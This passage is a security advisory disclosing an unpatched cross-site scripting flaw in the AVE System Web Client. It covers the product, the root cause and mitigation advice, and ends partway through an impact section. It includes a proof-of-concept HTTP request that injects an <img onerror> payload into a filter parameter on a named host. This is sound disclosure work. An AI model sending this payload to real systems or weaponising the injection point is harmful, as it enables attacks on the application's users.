XSS Vulnerability in AVE System Web Client

Version Details

Version: AVE System Web Client Version: 2.1.131.13992

Fixed Version: None

CVE ID: None

Vulnerability Type: Cross Site Scripting (XSS)

Description of the Product

AVE Web Client is a lightweight version of AVE Client. It doesn’t have to be installed and can be run in any Web browser (Chrome, IE, Firefox, etc.). It is a thin client designed for basic work with AVE (checking the progress of data reading, generating reports, reading and displaying data).

This module is also intended for outside traders, who need to have a quick overview of customers’ energy consumption, and for end users, who can display only selected data, not complete sets of meter reading data.

Description of the Vulnerability

Due to insufficient security measures in all input fields within the application, an XSS (Cross-Site Scripting) vulnerability exists.

Root Cause

The causes of the XSS vulnerability stem from processing user input in a way that allows JavaScript execution. For example, if HTML encoding is not applied to input received from users, it should be implemented to prevent providing the browser’s JavaScript engine with tags capable of executing JavaScript.

Additionally, a whitelist should be created for attributes that allow JavaScript execution; otherwise, an attacker could inject and execute JavaScript code.

Proof of Concept (PoC)


Example HTTP Request

GET /website/api/GetSchedulerProfiles.rails?_dc=1730446398457&sessionId=e59a5def61a9f6f39d776dad156c852c&schedulerIds=573&filter={"name":"<img src/onerror=prompt(1)>"}&page=1&start=0&limit=50 HTTP/1.1

Host: www.ave-system.com

Cookie:

Sec-Ch-Ua-Platform: "macOS"

X-Requested-With: XMLHttpRequest

Accept-Language: en-US,en;q=0.9

Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.59 Safari/537.36

Sec-Ch-Ua-Mobile: ?0

Accept: */*

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://www.ave-system.com/website/jsclient/index.html

Accept-Encoding: gzip, deflate, br

Priority: u=1, i

Connection: keep-alive

Impact of XSS Vulnerabilities

The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example: